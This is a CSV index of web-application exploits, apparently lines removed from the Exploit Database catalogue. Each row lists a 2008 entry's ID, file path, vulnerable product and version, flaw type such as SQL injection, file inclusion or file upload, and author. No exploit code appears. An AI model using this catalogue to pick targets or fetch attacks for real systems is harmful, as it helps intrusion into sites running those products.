-6680,exploits/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)",2008-10-05,Pepelux,php,webapps, -6681,exploits/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' SQL Injection",2008-10-05,boom3rang,php,webapps, -6682,exploits/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' SQL Injection",2008-10-05,boom3rang,php,webapps, -6683,exploits/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' SQL Injection",2008-10-05,boom3rang,php,webapps, -6684,exploits/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - 'raceid' SQL Injection",2008-10-05,boom3rang,php,webapps, -6685,exploits/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusions",2008-10-06,NoGe,php,webapps, -6687,exploits/php/webapps/6687.pl,"Yerba SACphp 6.3 - Local File Inclusion",2008-10-06,Pepelux,php,webapps, -6691,exploits/php/webapps/6691.txt,"Yerba SACphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps, -6692,exploits/php/webapps/6692.txt,"Joomla! Component com_hotspots - SQL Injection",2008-10-07,cOndemned,php,webapps, -6693,exploits/php/webapps/6693.txt,"Yourownbux 4.0 - 'cookie' SQL Injection",2008-10-07,Tec-n0x,php,webapps, -6694,exploits/php/webapps/6694.txt,"PHP Realtor 1.5 - 'v_cat' SQL Injection",2008-10-07,Mr.SQL,php,webapps, -6695,exploits/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - 'v_cat' SQL Injection",2008-10-07,Mr.SQL,php,webapps, -6696,exploits/php/webapps/6696.txt,"PHP Autos 2.9.1 - 'catid' SQL Injection",2008-10-07,Mr.SQL,php,webapps, -6697,exploits/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection",2008-10-07,d3v1l,php,webapps, -6698,exploits/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps, -6700,exploits/php/webapps/6700.txt,"DFF PHP Framework API - 'Data Feed File' Remote File Inclusion",2008-10-08,GoLd_M,php,webapps, -6701,exploits/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps, -6702,exploits/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,php,webapps, -6703,exploits/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / Remote File Disclosure",2008-10-08,GoLd_M,php,webapps, -6706,exploits/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution (1)",2008-10-09,Sausage,php,webapps, -6707,exploits/php/webapps/6707.txt,"GForge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps, -6708,exploits/php/webapps/6708.txt,"Gforge 4.6 rc1 - 'skill_edit' SQL Injection",2008-10-09,beford,php,webapps, -6709,exploits/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps, -6710,exploits/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps, -6711,exploits/php/webapps/6711.html,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps, -6712,exploits/php/webapps/6712.txt,"IranMC Arad Center - SQL Injection",2008-10-09,"Hussin X",php,webapps, -6713,exploits/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps, -6714,exploits/php/webapps/6714.pl,"Stash 1.0.3 - SQL Injection User Credentials Disclosure",2008-10-09,gnix,php,webapps, -6715,exploits/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps, -6720,exploits/asp/webapps/6720.txt,"Ayco Okul Portali - 'linkid' SQL Injection",2008-10-10,Crackers_Child,asp,webapps, -6721,exploits/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps, -6722,exploits/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps, -6723,exploits/php/webapps/6723.txt,"Joomla! Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,php,webapps, -6724,exploits/php/webapps/6724.txt,"Joomla! Component mad4Joomla! - SQL Injection",2008-10-10,H!tm@N,php,webapps, -6725,exploits/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - 'kat' SQL Injection",2008-10-10,LUPUS,asp,webapps, -6728,exploits/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' SQL Injection",2008-10-10,BeyazKurt,php,webapps, -6729,exploits/php/webapps/6729.php,"SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation",2008-10-10,StAkeR,php,webapps, -6730,exploits/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,php,webapps, -6731,exploits/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,asp,webapps, -6733,exploits/php/webapps/6733.txt,"mini-pub 0.3 - File Disclosure / Code Execution",2008-10-12,muuratsalo,php,webapps, -6734,exploits/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps, -6735,exploits/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting",2008-10-12,StAkeR,php,webapps, -6736,exploits/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'cat' SQL Injection",2008-10-12,Hakxer,php,webapps, -6737,exploits/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File",2008-10-12,JosS,php,webapps, -6739,exploits/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps, -6740,exploits/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps, -6743,exploits/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,php,webapps, -6744,exploits/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps, -6745,exploits/php/webapps/6745.txt,"ParsBlogger - 'links.asp' SQL Injection",2008-10-13,"Hussin X",php,webapps, -6746,exploits/php/webapps/6746.txt,"IndexScript 3.0 - 'parent_id' SQL Injection",2008-10-13,d3v1l,php,webapps, -6747,exploits/php/webapps/6747.php,"WordPress Plugin WP Comment Remix 1.4.3 - SQL Injection",2008-10-14,g30rg3_x,php,webapps, -6748,exploits/php/webapps/6748.txt,"XOOPS Module xhresim - SQL Injection",2008-10-14,EcHoLL,php,webapps, -6749,exploits/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps, -6751,exploits/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps, -6754,exploits/php/webapps/6754.txt,"My PHP Dating - 'id' SQL Injection",2008-10-14,Hakxer,php,webapps, -6755,exploits/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps, -6758,exploits/php/webapps/6758.txt,"AstroSPACES 1.1.1 - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps, -6759,exploits/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps, -6760,exploits/php/webapps/6760.txt,"myEvent 1.6 - 'eventdate' SQL Injection",2008-10-15,JosS,php,webapps, -6762,exploits/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injections",2008-10-16,0xFFFFFF,php,webapps, -6763,exploits/php/webapps/6763.txt,"Mosaic Commerce - 'cid' SQL Injection",2008-10-16,"Ali Abbasi",php,webapps, -6764,exploits/php/webapps/6764.php,"Mic_blog 0.0.3 - SQL Injection / Privilege Escalation",2008-10-16,StAkeR,php,webapps, -6765,exploits/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,php,webapps, -6766,exploits/php/webapps/6766.txt,"PokerMax Poker League 0.13 - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps, -6767,exploits/php/webapps/6767.txt,"Kure 0.6.3 - 'index.php' Local File Inclusion",2008-10-16,JosS,php,webapps, -6768,exploits/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,php,webapps, -6769,exploits/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,php,webapps, -6770,exploits/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - 'file' File Disclosure",2008-10-16,LMaster,php,webapps, -6771,exploits/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,cgi,webapps, -6772,exploits/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - 'md' Local File Inclusion",2008-10-16,ZeN,php,webapps, -6777,exploits/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps, -6778,exploits/php/webapps/6778.pl,"XOOPS Module GesGaleri - SQL Injection",2008-10-18,EcHoLL,php,webapps, -6779,exploits/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps, -6780,exploits/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps, -6781,exploits/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps, -6782,exploits/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps, -6783,exploits/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps, -6784,exploits/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps, -6785,exploits/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion",2008-10-19,NoGe,php,webapps, -6788,exploits/php/webapps/6788.txt,"Yappa-ng 2.3.3-beta0 - 'album' Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps, -6789,exploits/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps, -6790,exploits/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps, -6791,exploits/php/webapps/6791.pl,"e107 < 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps, -6792,exploits/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' SQL Injection",2008-10-20,boom3rang,php,webapps, -6795,exploits/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,php,webapps, -6796,exploits/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,php,webapps, -6797,exploits/php/webapps/6797.txt,"LightBlog 9.8 - 'GET' / 'POST' / 'COOKIE' Local File Inclusion",2008-10-21,JosS,php,webapps, -6799,exploits/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' SQL Injection",2008-10-21,"Hussin X",php,webapps, -6802,exploits/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps, -6803,exploits/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps, -6806,exploits/php/webapps/6806.txt,"phpcrs 2.06 - 'importFunction' Local File Inclusion",2008-10-22,Pepelux,php,webapps, -6808,exploits/php/webapps/6808.pl,"LoudBlog 0.8.0a - 'ajax.php' SQL Injection",2008-10-22,Xianur0,php,webapps, -6809,exploits/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps, -6810,exploits/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps, -6811,exploits/php/webapps/6811.txt,"YDC - 'cat' SQL Injection",2008-10-22,"Hussin X",php,webapps, -6814,exploits/php/webapps/6814.php,"CSPartner 1.0 - Delete All Users / SQL Injection",2008-10-23,StAkeR,php,webapps, -6816,exploits/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps, -6817,exploits/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps, -6818,exploits/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps, -6819,exploits/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - SQL Injection",2008-10-23,"CWH Underground",php,webapps, -6820,exploits/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps, -6821,exploits/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps, -6822,exploits/php/webapps/6822.txt,"WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps, -6823,exploits/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps, -6826,exploits/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps, -6827,exploits/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps, -6829,exploits/php/webapps/6829.txt,"Aj RSS Reader - 'url' SQL Injection",2008-10-24,yassine_enp,php,webapps, -6830,exploits/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps, -6833,exploits/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps, -6835,exploits/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Remote File Disclosure",2008-10-24,b3hz4d,php,webapps, -6836,exploits/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps, -6837,exploits/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injections",2008-10-25,G4N0K,php,webapps, -6839,exploits/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php?id' SQL Injection",2008-10-26,"Hussin X",php,webapps, -6842,exploits/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,php,webapps, -6843,exploits/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps, -6844,exploits/php/webapps/6844.pl,"MyForum 1.3 - 'lecture.php' SQL Injection",2008-10-26,Vrs-hCk,php,webapps, -6845,exploits/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps, -6846,exploits/php/webapps/6846.txt,"MyForum 1.3 - 'padmin' Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps, -6847,exploits/php/webapps/6847.txt,"Persia BME E-Catalogue - SQL Injection",2008-10-27,BugReport.IR,php,webapps, -6848,exploits/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps, -6849,exploits/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps, -6850,exploits/php/webapps/6850.txt,"MyKtools 2.4 - 'langage' Local File Inclusion",2008-10-27,x0r,php,webapps, -6852,exploits/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Blind SQL Injection",2008-10-27,StAkeR,php,webapps, -6853,exploits/php/webapps/6853.txt,"QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps, -6854,exploits/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps, -6855,exploits/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps, -6856,exploits/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,php,webapps, -6857,exploits/php/webapps/6857.txt,"MyForum 1.3 - Insecure Cookie Handling",2008-10-28,Stack,php,webapps, -6858,exploits/php/webapps/6858.txt,"PersianBB - 'id' SQL Injection",2008-10-28,"Hussin X",php,webapps, -6859,exploits/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion",2008-10-28,DaRkLiFe,php,webapps, -6860,exploits/php/webapps/6860.txt,"TlGuestBook 1.2 - Insecure Cookie Handling",2008-10-28,x0r,php,webapps, -6861,exploits/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution",2008-10-28,StAkeR,php,webapps, -6862,exploits/php/webapps/6862.txt,"H2O-CMS 3.4 - Insecure Cookie Handling",2008-10-29,Stack,php,webapps, -6864,exploits/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - 'board.cgi' Remote Command Execution",2008-10-29,GoLd_M,cgi,webapps, -6865,exploits/php/webapps/6865.txt,"e107 plugin fm pro 1 - File Disclosure / Arbitrary File Upload / Directory Traversal",2008-10-29,GoLd_M,php,webapps, -6866,exploits/php/webapps/6866.pl,"7Shop 1.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps, -6867,exploits/php/webapps/6867.pl,"WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps, -6868,exploits/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps, -6869,exploits/php/webapps/6869.txt,"WebCards 1.3 - SQL Injection",2008-10-29,t0pP8uZz,php,webapps, -6874,exploits/php/webapps/6874.txt,"Harlandscripts Pro Traffic One - 'mypage.php' SQL Injection",2008-10-29,"Beenu Arora",php,webapps, -6876,exploits/php/webapps/6876.txt,"Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,php,webapps, -6877,exploits/php/webapps/6877.txt,"Pro Traffic One - 'poll_results.php' SQL Injection",2008-10-29,"Hussin X",php,webapps, -6879,exploits/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics / Blind SQL Injection",2008-10-30,StAkeR,php,webapps, -6881,exploits/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps, -6882,exploits/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps, -6883,exploits/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps, -6885,exploits/php/webapps/6885.txt,"e107 Plugin lyrics_menu - 'l_id' SQL Injection",2008-10-31,ZoRLu,php,webapps, -6886,exploits/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (Beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps, -6887,exploits/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,php,webapps, -6888,exploits/php/webapps/6888.txt,"Tribiq CMS 5.0.10a (Windows) - Local File Inclusion",2008-10-31,GoLd_M,php,webapps, -6889,exploits/php/webapps/6889.txt,"Absolute Content Rotator 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps, -6890,exploits/php/webapps/6890.txt,"Absolute Banner Manager - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps, -6891,exploits/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps, -6892,exploits/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps, -6893,exploits/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps, -6894,exploits/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps, -6895,exploits/php/webapps/6895.txt,"SFS EZ Adult Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps, -6896,exploits/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - 'art' SQL Injection",2008-10-31,ZoRLu,php,webapps, -6897,exploits/php/webapps/6897.txt,"cPanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps, -6898,exploits/php/webapps/6898.txt,"U-Mail Webmail 4.91 - 'edit.php' Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps, -6900,exploits/php/webapps/6900.txt,"Absolute News Manager 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps, -6901,exploits/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps, -6902,exploits/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps, -6903,exploits/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps, -6904,exploits/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps, -6905,exploits/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps, -6906,exploits/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps, -6907,exploits/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps, -6908,exploits/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps, -6909,exploits/php/webapps/6909.txt,"Adult Banner Exchange Website - 'targetid' SQL Injection",2008-10-31,"Hussin X",php,webapps, -6910,exploits/php/webapps/6910.txt,"SFS EZ BIZ PRO - SQL Injection",2008-10-31,"Hussin X",php,webapps, -6911,exploits/php/webapps/6911.txt,"SFS EZ Affiliate - 'cat_id' SQL Injection",2008-10-31,d3b4g,php,webapps, -6912,exploits/php/webapps/6912.txt,"Article Publisher PRO 1.5 - Authentication Bypass",2008-10-31,Hakxer,php,webapps, -6913,exploits/php/webapps/6913.txt,"SFS EZ Webring - 'cat' SQL Injection",2008-10-31,d3b4g,php,webapps, -6914,exploits/php/webapps/6914.txt,"SFS EZ Hot or Not - 'phid' SQL Injection",2008-10-31,d3b4g,php,webapps, -6915,exploits/php/webapps/6915.txt,"SFS EZ Software - 'id' SQL Injection",2008-10-31,x0r,php,webapps, -6916,exploits/php/webapps/6916.txt,"ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion",2008-10-31,nigh7f411,php,webapps, -6917,exploits/php/webapps/6917.php,"Article Publisher PRO - 'userid' SQL Injection",2008-10-31,Stack,php,webapps, -6918,exploits/php/webapps/6918.txt,"SFS EZ Auction - Blind SQL Injection",2008-10-31,Stack,php,webapps, -6919,exploits/php/webapps/6919.txt,"SFS EZ Career - SQL Injection",2008-10-31,Stack,php,webapps, -6920,exploits/php/webapps/6920.txt,"SFS EZ Top Sites - SQL Injection",2008-10-31,Stack,php,webapps, -6922,exploits/php/webapps/6922.txt,"SFS EZ Webstore - 'where' SQL Injection",2008-11-01,ZoRLu,php,webapps, -6923,exploits/php/webapps/6923.txt,"SFS EZ Pub Site - SQL Injection",2008-11-01,Hakxer,php,webapps, -6924,exploits/php/webapps/6924.txt,"SFS EZ Gaming Cheats - SQL Injection",2008-11-01,ZoRLu,php,webapps, -6925,exploits/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - Insecure Cookie Handling / SQL Injection",2008-11-01,JosS,php,webapps, -6928,exploits/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps, -6929,exploits/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps, -6930,exploits/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps, -6931,exploits/php/webapps/6931.txt,"YourFreeWorld Programs Rating - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6932,exploits/php/webapps/6932.txt,"AJ Article 1.0 - Authentication Bypass",2008-11-01,Hakxer,php,webapps, -6933,exploits/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote Add/Delete/Password Change",2008-11-01,StAkeR,php,webapps, -6934,exploits/php/webapps/6934.txt,"Shahrood - Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps, -6935,exploits/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'tr.php' SQL Injection",2008-11-01,"Hussin X",php,webapps, -6936,exploits/php/webapps/6936.txt,"YourFreeWorld Banner Management - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6937,exploits/php/webapps/6937.txt,"YourFreeWorld Blog Blaster - 'tr.php' SQL Injection",2008-11-01,"Hussin X",php,webapps, -6938,exploits/php/webapps/6938.txt,"YourFreeWorld Autoresponder Hosting - 'tr.php' SQL Injection",2008-11-01,"Hussin X",php,webapps, -6939,exploits/php/webapps/6939.txt,"YourFreeWorld Forced Matrix Script - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6940,exploits/php/webapps/6940.txt,"YourFreeWorld Short Url & Url Tracker - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6941,exploits/php/webapps/6941.txt,"YourFreeWorld Viral Marketing - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6942,exploits/php/webapps/6942.txt,"YourFreeWorld Scrolling Text Ads - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6943,exploits/php/webapps/6943.txt,"YourFreeWorld Reminder Service - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6944,exploits/php/webapps/6944.txt,"YourFreeWorld Classifieds Blaster - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6945,exploits/php/webapps/6945.txt,"YourFreeWorld Classifieds - 'category' SQL Injection",2008-11-01,"Hussin X",php,webapps, -6946,exploits/php/webapps/6946.txt,"Downline Goldmine Builder - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6947,exploits/php/webapps/6947.txt,"Downline Goldmine Category Addon - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6948,exploits/php/webapps/6948.txt,"YourFreeWorld Classifieds Hosting - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6949,exploits/php/webapps/6949.txt,"YourFreeWorld URL Rotator - SQL Injection",2008-11-01,"Hussin X",php,webapps, -6950,exploits/php/webapps/6950.txt,"Downline Goldmine paidversion - SQL Injection",2008-11-02,"Hussin X",php,webapps, -6951,exploits/php/webapps/6951.txt,"Downline Goldmine newdownlinebuilder - SQL Injection",2008-11-02,"Hussin X",php,webapps, -6952,exploits/php/webapps/6952.txt,"YourFreeWorld Shopping Cart - Blind SQL Injection",2008-11-02,"Hussin X",php,webapps, -6953,exploits/php/webapps/6953.txt,"Maran PHP Shop - 'prod.php' SQL Injection",2008-11-02,JosS,php,webapps, -6954,exploits/php/webapps/6954.txt,"Maran PHP Shop - 'admin.php' Insecure Cookie Handling",2008-11-02,JosS,php,webapps, -6955,exploits/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,php,webapps, -6956,exploits/php/webapps/6956.txt,"Apartment Search Script - Arbitrary File Upload / Cross-Site Scripting",2008-11-02,ZoRLu,php,webapps, -6957,exploits/php/webapps/6957.txt,"NetRisk 2.0 - Cross-Site Scripting / SQL Injection",2008-11-02,StAkeR,php,webapps, -6958,exploits/php/webapps/6958.txt,"Maran PHP Shop - 'prodshow.php' SQL Injection",2008-11-02,d3v1l,php,webapps, -6960,exploits/php/webapps/6960.txt,"1st News - SQL Injection",2008-11-02,TR-ShaRk,php,webapps, -6961,exploits/php/webapps/6961.pl,"DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection",2008-11-02,anonymous,php,webapps, -6962,exploits/php/webapps/6962.txt,"BosClassifieds - 'cat_id' SQL Injection",2008-11-03,ZoRLu,php,webapps, -6964,exploits/php/webapps/6964.txt,"Acc Real Estate 4.0 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps, -6965,exploits/php/webapps/6965.txt,"Acc Statistics 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps, -6966,exploits/php/webapps/6966.txt,"Acc PHP eMail 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps, -6967,exploits/php/webapps/6967.txt,"MatPo Link 1.2b - SQL Injection",2008-11-03,ZoRLu,php,webapps, 